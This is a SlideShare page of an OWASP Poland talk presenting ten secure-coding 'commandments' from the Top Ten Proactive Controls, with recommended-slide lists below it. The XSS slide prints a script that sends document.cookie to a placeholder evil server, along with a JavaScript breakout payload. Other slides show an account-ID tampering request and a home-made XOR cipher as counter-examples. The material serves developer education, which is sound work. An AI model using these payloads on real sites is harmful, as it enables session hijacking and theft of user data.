SlideShare uma empresa Scribd logo

Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls

Transferir como PPTX, PDF
SecuRing
SecuRing

OWASP - Open Web Applications Security Project to fundacja której celem jest eliminacja problemów bezpieczeństwa aplikacji. OWASP działa w duchu "open source" i dostarcza narzędzi, informacji i wiedzy pozwalających podnieść poziom bezpieczeństwa aplikacji. W trakcie wykładu przedstawię krótko OWASP Top 10 w wydaniu dla programistów, czyli "Top 10 Proactive Controls" a więc najważniejsze zalecenia pozwalające na uniknięcie kluczowych błędów bezpieczeństwa.

Software
1 de 52
Ten Commandments of Secure Coding OWASP Top Ten Proactive Controls Mateusz Olejarka OWASP Poland
Mateusz Olejarka @molejarka • Senior IT Security Consultant @SecuRing • Ex-developer • OWASP Poland since 2011
OWASP O = Open • Docs & tools – free – Creative Commons license – open source • Build with open collaboration in mind – Each one of you can join 3
OWASP Poland Chapter • Since 2007 • Meetings: Kraków, Poznań, Warszawa • Free entry • Supporters:
4Developers 2014* questionnaire * SecuRing’s study „Praktyki wytwarzania bezpiecznego oprogramowania w polskich firmach – 2014” • 62% companies do not educate programmers on application security • >50% companies do not consider security during the design stage • 73% participants confirmed, that they fixed security related issues • only 42% confirmed, that they do security testing before production deployment
OWASP Top10 Risk vs OWASP Top10 Proactive Controls
Disclaimer • Do not rely your application security on Top 10 * – It is purely educational material – Each application has its own risk profile
Thou shalt parametrize queries 1: Parametrize queries
SQL/LDAP/XML/cmd/…-injection Easily exploitable • Simple to use tools exist Devastating impact Źródło: http://xkcd.com/327/
Best practices #1 Prepared Statements / Parametrized Queries #2 Stored Procedures – Watch for exeptions! (eval,dynamic block, etc.) #3 Escaping – risky! String newName = request.getParameter("newName"); String id = request.getParameter("id"); PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id);
References • Bobby Tables: A guide to preventing SQL injection • Query Parameterization Cheat Sheet • SQL Injection Prevention Cheat Sheet • OWASP Secure Coding Practices Quick Reference Guide
2: Thou shalt encode data 2: Encode Data
XSS • Site defacement • Session hijacking <script>document.body.innerHTML(“Jim was here”);</script> <script> var img = new Image(); img.src="http://<some evil server>.com?” + document.cookie; </script>
Results of missing encoding • Session hijacking • Network scanning • CSRF prevention bypass • Site defacement (browser) • … • Browser hijack – vide BeEF
Cross Site Scripting But when we write output inside pure JavaScript: <script> var split='<bean:write name="transferFormId" property="trn_recipient">'; splitRecipient(split); </script> trn_recipient=';alert('xss');-- <script> var split='';alert('xss');--
Best practices • Special character encoding has to be context aware – HTML element – HTML attribute – JavaScript – JSON – CSS / style – URL
References • XSS (Cross Site Scripting) Prevention Cheat Sheet • Java Encoder Project • Microsoft .NET AntiXSS Library • OWASP ESAPI • Encoder Comparison Reference Project
Thou shalt validate all inputs 3: Validate All Inputs
Why validate anything? • Most of other vulnerabilities (np. injections, xss, …) occurs (also) from missing input validation • Validation it is like firewall – Do not protects you agains everything – …but nice to have
Best practices • Prefer whitelist over blacklist approach, • Use strongly typed fields – One validator per one data type – Easier to integrate a WAF • Validation = first line of defence – For exaple type casting prevents injection – But not the only one!
References • Input Validation Cheat Sheet • Apache Commons Validator • OWASP JSON Sanitizer Project • OWASP Java HTML Sanitizer Project • Google Caja
Thou shalt implement appropriate access controls 4: Implement Appropriate Access Controls
Account history
HTTP request GET /services/history/account/85101022350445200448009906 HTTP/1.1 SA-DeviceId: 940109f08ba56a89 SA-SessionId: 826175 Accept: application/json Host: acc Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) GET /services/history/account/45101022350445200448005388 HTTP/1.1 SA-DeviceId: 940109f08ba56a89 SA-SessionId: 826175 Accept: application/json Host: acc Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) Account id change – we get other user data
Best practices • Server makes a final call! • Default deny • All request must go through access controll – centralized, easy to use mechanism • Access control rules (policy) should be separated from code – Not a part of it
if (currentUser.hasRole(“administrator”)) { //pozwol } else { //zabron } If (currentUser.isPermitted(printPermission)) { //pozwol } else { //zabron }
References • Access Control Cheat Sheet • Java Authorization Guide with Apache Shiro – Apache Shiro Authorization features • OWASP PHPRBAC Project
Thou shalt establish identity and authentication controls 5: Establish Identity and Authentication Controls
Example vulnerability • Authentication with locally stored key (on the machine) • Process: 1. Enter login 2. Select key file,enter key password 3. We are logged in https://...../GenerateNewKey
Best practices • Check access control for the functions allowing to change authentication credentials • „chain of trust” rule • Watch for session at the border! • Do not limit length and characters to use in password
References • Authentication Cheat Sheet • Password Storage Cheat Sheet • Forgot Password Cheat Sheet • Session Management Cheat Sheet
Thou shalt protect data and privacy 6: Protect Data and Privacy
Example (at transit) • SSL covers encryption and authentication • What verifies servers identity? – Web applications: Browser – Mobile / thick-client / embedded… application: Application • Common errors – Missing certificate validation – Brak sprawdzenia certyfikatu lub „łańcucha zaufania” – Missing exception handling
Best practices (in transit) • TLS • For whole application • Cookies: „Secure” flag • HTTP Strict Transport Security • Strong cipher suites • Chain of trust • Certificate pinning
References (in transit) • Transport Layer Protection Cheat Sheet • Pinning Cheat Sheet • OWASP O-Saft (SSL Audit for Testers)
Example (at rest) • Storing password • „Own” SHA1 function public static String encrypt(byte [] in) { String out = ""; for(int i = 0; i < in.length; i++) { byte b = (byte)(in[i] ^ key[i%key.length]); out += "" + hexDigit[(b & 0xf0)>>4] + hexDigit[b & 0x0f]; } return out; }
Best practices(at rest) • Do not reinwent the wheel! – Home-bred ciphers are evil – Own crypto is evil – Only libraries with reputation! • Strong ciphers in strong modes – ECB is evil – CBC – watch for „padding oracle” • Good RNG for IV
References • Google KeyCzar • Cryptographic Storage Cheat Sheet • Password Storage Cheat Sheet
Thou shalt implement logging, error handling and intrusion detection 7: Implement Logging, Error Handling and Intrusion Detection
References • Logging Cheat Sheet • OWASP AppSensor Project
Thou shalt leverage security features of frameworks and security libraries 8: Leverage Security Features of Frameworks and Security Libraries
Refenences • PHP Security Cheat Sheet • .NET Security Cheat Sheet • Spring Security • Apache Shiro • OWASP Dependency Check / Track
Thou shalt include security- specific requirements 9: Include Security-Specific Requirements
Building requirements • Attack scenatios – How threats can reach the objectives? – Requires experience and expertise • Selection of security controls == REQUIREMENTS Threat Results Attack scenarios Who? How? What?
References • OWASP Application Security Verification Standard Project • Software Assurance Maturity Model • Business Logic Security Cheat Sheet • Testing for business logic (OWASP-BL-001)
Thou shalt design and architect security in 10: Design and Architect Security In
References • Software Assurance Maturity Model (OpenSAMM) • Application Security Verification Standard Project • Application Security Architecture Cheat Sheet • Attack Surface Analysis Cheat Sheet • Threat Modeling Cheat Sheet
Summary
That was just the Top Ten! • Each application is different – Risk profile should be defined (WHO? WHY?) – Consider „compliance with existing regulations” • Few easy steps with big positive impact • Developers education is worth it!
OWASP meetings • https://www.owasp.org/index.php/Poland • Mailing list • Facebook: OWASP Poland Local Chapter • Twitter: @owasppoland
Thank you! Mateusz Olejarka @molejarka mateusz.olejarka@owasp.org

Recomendados

Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
Jakub Kałużny
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces security
SecuRing
 
Secure code
Secure codeSecure code
Secure code
ddeogun
 
Secure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesSecure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best Practices
Websecurify
 
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016
SecuRing
 
Secure coding in C#
Secure coding in C#Secure coding in C#
Secure coding in C#
Siddharth Bezalwar
 
Secure PHP Coding
Secure PHP CodingSecure PHP Coding
Secure PHP Coding
Narudom Roongsiriwong, CISSP
 

Recomendados

Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
Jakub Kałużny
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces security
SecuRing
 
Secure code
Secure codeSecure code
Secure code
ddeogun
 
Secure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesSecure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best Practices
Websecurify
 
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016
SecuRing
 
Secure coding in C#
Secure coding in C#Secure coding in C#
Secure coding in C#
Siddharth Bezalwar
 
Secure PHP Coding
Secure PHP CodingSecure PHP Coding
Secure PHP Coding
Narudom Roongsiriwong, CISSP
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive Controls
Katy Anton
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
Paul Ionescu
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
Jim Manico
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101
Paul Ionescu
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
Jim Manico
 
Java Secure Coding Practices
Java Secure Coding PracticesJava Secure Coding Practices
Java Secure Coding Practices
OWASPKerala
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
Jim Manico
 
Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...
Codemotion
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure Coding
Mateusz Olejarka
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
Jim Manico
 
Owasp Top 10 - A1 Injection
Owasp Top 10 - A1 InjectionOwasp Top 10 - A1 Injection
Owasp Top 10 - A1 Injection
Paul Ionescu
 
L27
L27L27
L27
NathannyabvureMapisa
 
Neoito — Secure coding practices
Neoito — Secure coding practicesNeoito — Secure coding practices
Neoito — Secure coding practices
Neoito
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
Prathan Phongthiproek
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Coding
bilcorry
 
HackFest 2015 - Rasp vs waf
HackFest 2015 - Rasp vs wafHackFest 2015 - Rasp vs waf
HackFest 2015 - Rasp vs waf
IMMUNIO
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
Mohammed ALDOUB
 
Access Control Pitfalls v2
Access Control Pitfalls v2Access Control Pitfalls v2
Access Control Pitfalls v2
Jim Manico
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In Php
Akash Mahajan
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017
Aaron Hnatiw
 
AppSec EU 2015 - E-banking transaction authorization - possible vulnerabiliti...
AppSec EU 2015 - E-banking transaction authorization - possible vulnerabiliti...AppSec EU 2015 - E-banking transaction authorization - possible vulnerabiliti...
AppSec EU 2015 - E-banking transaction authorization - possible vulnerabiliti...
SecuRing
 
Rapid Threat Modeling Techniques
Rapid Threat Modeling TechniquesRapid Threat Modeling Techniques
Rapid Threat Modeling Techniques
Priyanka Aash
 

Mais conteúdo relacionado

Mais procurados

Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
Jim Manico
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
Jim Manico
 
Neoito — Secure coding practices
Neoito — Secure coding practicesNeoito — Secure coding practices
Neoito — Secure coding practices
Neoito
 
HackFest 2015 - Rasp vs waf
HackFest 2015 - Rasp vs wafHackFest 2015 - Rasp vs waf
HackFest 2015 - Rasp vs waf
IMMUNIO
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017
Aaron Hnatiw
 

Mais procurados (20)

OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive Controls
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
Java Secure Coding Practices
Java Secure Coding PracticesJava Secure Coding Practices
Java Secure Coding Practices
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
 
Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure Coding
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
Owasp Top 10 - A1 Injection
Owasp Top 10 - A1 InjectionOwasp Top 10 - A1 Injection
Owasp Top 10 - A1 Injection
 
L27
L27L27
L27
 
Neoito — Secure coding practices
Neoito — Secure coding practicesNeoito — Secure coding practices
Neoito — Secure coding practices
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Coding
 
HackFest 2015 - Rasp vs waf
HackFest 2015 - Rasp vs wafHackFest 2015 - Rasp vs waf
HackFest 2015 - Rasp vs waf
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
 
Access Control Pitfalls v2
Access Control Pitfalls v2Access Control Pitfalls v2
Access Control Pitfalls v2
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In Php
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017
 

Destaque

AppSec EU 2015 - E-banking transaction authorization - possible vulnerabiliti...
AppSec EU 2015 - E-banking transaction authorization - possible vulnerabiliti...AppSec EU 2015 - E-banking transaction authorization - possible vulnerabiliti...
AppSec EU 2015 - E-banking transaction authorization - possible vulnerabiliti...
SecuRing
 
Zagrożenia dla aplikacji bankowych i sposoby zmniejszania ryzyka
Zagrożenia dla aplikacji bankowych i sposoby zmniejszania ryzykaZagrożenia dla aplikacji bankowych i sposoby zmniejszania ryzyka
Zagrożenia dla aplikacji bankowych i sposoby zmniejszania ryzyka
SecuRing
 
Modelowanie zagrożeń - Na przykladzie platności mobilnych
Modelowanie zagrożeń - Na przykladzie platności mobilnychModelowanie zagrożeń - Na przykladzie platności mobilnych
Modelowanie zagrożeń - Na przykladzie platności mobilnych
SecuRing
 
009 sql server management studio
009 sql server management studio009 sql server management studio
009 sql server management studio
let's go to study
 

Destaque (20)

AppSec EU 2015 - E-banking transaction authorization - possible vulnerabiliti...
AppSec EU 2015 - E-banking transaction authorization - possible vulnerabiliti...AppSec EU 2015 - E-banking transaction authorization - possible vulnerabiliti...
AppSec EU 2015 - E-banking transaction authorization - possible vulnerabiliti...
 
Rapid Threat Modeling Techniques
Rapid Threat Modeling TechniquesRapid Threat Modeling Techniques
Rapid Threat Modeling Techniques
 
Understanding the Regulatory Evolution of Mobile Commerce and the Opportun...
Understanding the Regulatory Evolution of Mobile Commerce and the Opportun...Understanding the Regulatory Evolution of Mobile Commerce and the Opportun...
Understanding the Regulatory Evolution of Mobile Commerce and the Opportun...
 
Owasp Proactive Controls for Web developer
Owasp Proactive Controls for Web developerOwasp Proactive Controls for Web developer
Owasp Proactive Controls for Web developer
 
Zagrożenia dla aplikacji bankowych i sposoby zmniejszania ryzyka
Zagrożenia dla aplikacji bankowych i sposoby zmniejszania ryzykaZagrożenia dla aplikacji bankowych i sposoby zmniejszania ryzyka
Zagrożenia dla aplikacji bankowych i sposoby zmniejszania ryzyka
 
Robert Hurlbut - Threat Modeling for Secure Software Design
Robert Hurlbut - Threat Modeling for Secure Software DesignRobert Hurlbut - Threat Modeling for Secure Software Design
Robert Hurlbut - Threat Modeling for Secure Software Design
 
Modelowanie zagrożeń - Na przykladzie platności mobilnych
Modelowanie zagrożeń - Na przykladzie platności mobilnychModelowanie zagrożeń - Na przykladzie platności mobilnych
Modelowanie zagrożeń - Na przykladzie platności mobilnych
 
ICT security and Open Data
ICT security and Open DataICT security and Open Data
ICT security and Open Data
 
Legacy-SecDevOps (AppSec Management Debrief)
Legacy-SecDevOps (AppSec Management Debrief)Legacy-SecDevOps (AppSec Management Debrief)
Legacy-SecDevOps (AppSec Management Debrief)
 
Building an Open Source AppSec Pipeline
Building an Open Source AppSec PipelineBuilding an Open Source AppSec Pipeline
Building an Open Source AppSec Pipeline
 
AppSec Pipelines and Event based Security
AppSec Pipelines and Event based SecurityAppSec Pipelines and Event based Security
AppSec Pipelines and Event based Security
 
AppSec is Eating Security
AppSec is Eating SecurityAppSec is Eating Security
AppSec is Eating Security
 
009 sql server management studio
009 sql server management studio009 sql server management studio
009 sql server management studio
 
ASP.NET Core deployment options
ASP.NET Core deployment optionsASP.NET Core deployment options
ASP.NET Core deployment options
 
Javascript and Jquery: The connection between
Javascript and Jquery: The connection betweenJavascript and Jquery: The connection between
Javascript and Jquery: The connection between
 
OOPs fundamentals session for freshers in my office (Aug 5, 13)
OOPs fundamentals session for freshers in my office (Aug 5, 13)OOPs fundamentals session for freshers in my office (Aug 5, 13)
OOPs fundamentals session for freshers in my office (Aug 5, 13)
 
Sql server 2012 ha dr
Sql server 2012 ha drSql server 2012 ha dr
Sql server 2012 ha dr
 
Back to the Basics - 1 - Introduction to Web Development
Back to the Basics - 1 - Introduction to Web DevelopmentBack to the Basics - 1 - Introduction to Web Development
Back to the Basics - 1 - Introduction to Web Development
 
.Net framework architecture
.Net framework architecture.Net framework architecture
.Net framework architecture
 
Threat Modeling web applications (2012 update)
Threat Modeling web applications (2012 update)Threat Modeling web applications (2012 update)
Threat Modeling web applications (2012 update)
 

Semelhante a Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls

Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
Geoffrey Vandiest
 
AppSec in an Agile World
AppSec in an Agile WorldAppSec in an Agile World
AppSec in an Agile World
David Lindner
 
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
Philippe Gamache
 
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017 OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
Philippe Gamache
 
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFOWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
Brian Huff
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Denim Group
 
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer ToolsDevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
Amazon Web Services
 

Semelhante a Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls (20)

Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
 
we45 DEFCON Workshop - Building AppSec Automation with Python
we45 DEFCON Workshop - Building AppSec Automation with Pythonwe45 DEFCON Workshop - Building AppSec Automation with Python
we45 DEFCON Workshop - Building AppSec Automation with Python
 
AppSec in an Agile World
AppSec in an Agile WorldAppSec in an Agile World
AppSec in an Agile World
 
The OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack Proxy
 
Alexey Sintsov- SDLC - try me to implement
Alexey Sintsov- SDLC - try me to implementAlexey Sintsov- SDLC - try me to implement
Alexey Sintsov- SDLC - try me to implement
 
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
 
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017 OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
 
security misconfigurations
security misconfigurationssecurity misconfigurations
security misconfigurations
 
Software Development in the Age of Breaches
Software Development in the Age of BreachesSoftware Development in the Age of Breaches
Software Development in the Age of Breaches
 
Owasp top10salesforce
Owasp top10salesforceOwasp top10salesforce
Owasp top10salesforce
 
Securing Systems at Cloud Scale with DevSecOps
Securing Systems at Cloud Scale with DevSecOpsSecuring Systems at Cloud Scale with DevSecOps
Securing Systems at Cloud Scale with DevSecOps
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Java application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developerJava application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developer
 
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFOWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
 
Securing your web apps now
Securing your web apps nowSecuring your web apps now
Securing your web apps now
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
 
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer ToolsDevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
 
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
 
OWASP Top 10 Web Vulnerabilities from DCC 04/14
OWASP Top 10 Web Vulnerabilities from DCC 04/14OWASP Top 10 Web Vulnerabilities from DCC 04/14
OWASP Top 10 Web Vulnerabilities from DCC 04/14
 

Mais de SecuRing

Developer in a digital crosshair, 2023 edition - 4Developers
Developer in a digital crosshair, 2023 edition - 4DevelopersDeveloper in a digital crosshair, 2023 edition - 4Developers
Developer in a digital crosshair, 2023 edition - 4Developers
SecuRing
 
Is persistency on serverless even possible?!
Is persistency on serverless even possible?!Is persistency on serverless even possible?!
Is persistency on serverless even possible?!
SecuRing
 
What happens on your Mac, stays on Apple’s iCloud?!
What happens on your Mac, stays on Apple’s iCloud?!What happens on your Mac, stays on Apple’s iCloud?!
What happens on your Mac, stays on Apple’s iCloud?!
SecuRing
 
0-Day Up Your Sleeve - Attacking macOS Environments
0-Day Up Your Sleeve - Attacking macOS Environments0-Day Up Your Sleeve - Attacking macOS Environments
0-Day Up Your Sleeve - Attacking macOS Environments
SecuRing
 
20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy Mechanisms20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy Mechanisms
SecuRing
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
SecuRing
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
SecuRing
 
Attacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chainAttacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chain
SecuRing
 
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standardsWeb Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
SecuRing
 
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
SecuRing
 

Mais de SecuRing (20)

Developer in a digital crosshair, 2023 edition - 4Developers
Developer in a digital crosshair, 2023 edition - 4DevelopersDeveloper in a digital crosshair, 2023 edition - 4Developers
Developer in a digital crosshair, 2023 edition - 4Developers
 
Developer in a digital crosshair, 2022 edition - Oh My H@ck!
Developer in a digital crosshair, 2022 edition - Oh My H@ck!Developer in a digital crosshair, 2022 edition - Oh My H@ck!
Developer in a digital crosshair, 2022 edition - Oh My H@ck!
 
Developer in a digital crosshair, 2022 edition - No cON Name
Developer in a digital crosshair, 2022 edition - No cON NameDeveloper in a digital crosshair, 2022 edition - No cON Name
Developer in a digital crosshair, 2022 edition - No cON Name
 
Is persistency on serverless even possible?!
Is persistency on serverless even possible?!Is persistency on serverless even possible?!
Is persistency on serverless even possible?!
 
What happens on your Mac, stays on Apple’s iCloud?!
What happens on your Mac, stays on Apple’s iCloud?!What happens on your Mac, stays on Apple’s iCloud?!
What happens on your Mac, stays on Apple’s iCloud?!
 
0-Day Up Your Sleeve - Attacking macOS Environments
0-Day Up Your Sleeve - Attacking macOS Environments0-Day Up Your Sleeve - Attacking macOS Environments
0-Day Up Your Sleeve - Attacking macOS Environments
 
Developer in a digital crosshair, 2022 edition
